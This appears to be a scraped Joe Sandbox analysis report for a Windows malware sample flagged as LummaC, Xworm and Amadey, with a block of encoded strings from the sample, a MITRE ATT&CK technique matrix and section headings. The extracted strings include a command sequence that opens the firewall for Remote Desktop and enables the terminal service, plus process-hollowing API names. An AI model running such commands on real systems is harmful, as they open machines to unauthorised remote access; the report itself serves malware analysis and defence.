QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	11 Scheduled Task/Job	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 Command and Scripting Interpreter	121 Registry Run Keys / Startup Folder	212 Process Injection	41 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	Login Hook	11 Scheduled Task/Job	32 Software Packing	NTDS	249 System Information Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	121 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	991 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	471 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	471 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	212 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Rundll32	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report S2W2ftXM2b.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Xworm

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
S2W2ftXM2b.exe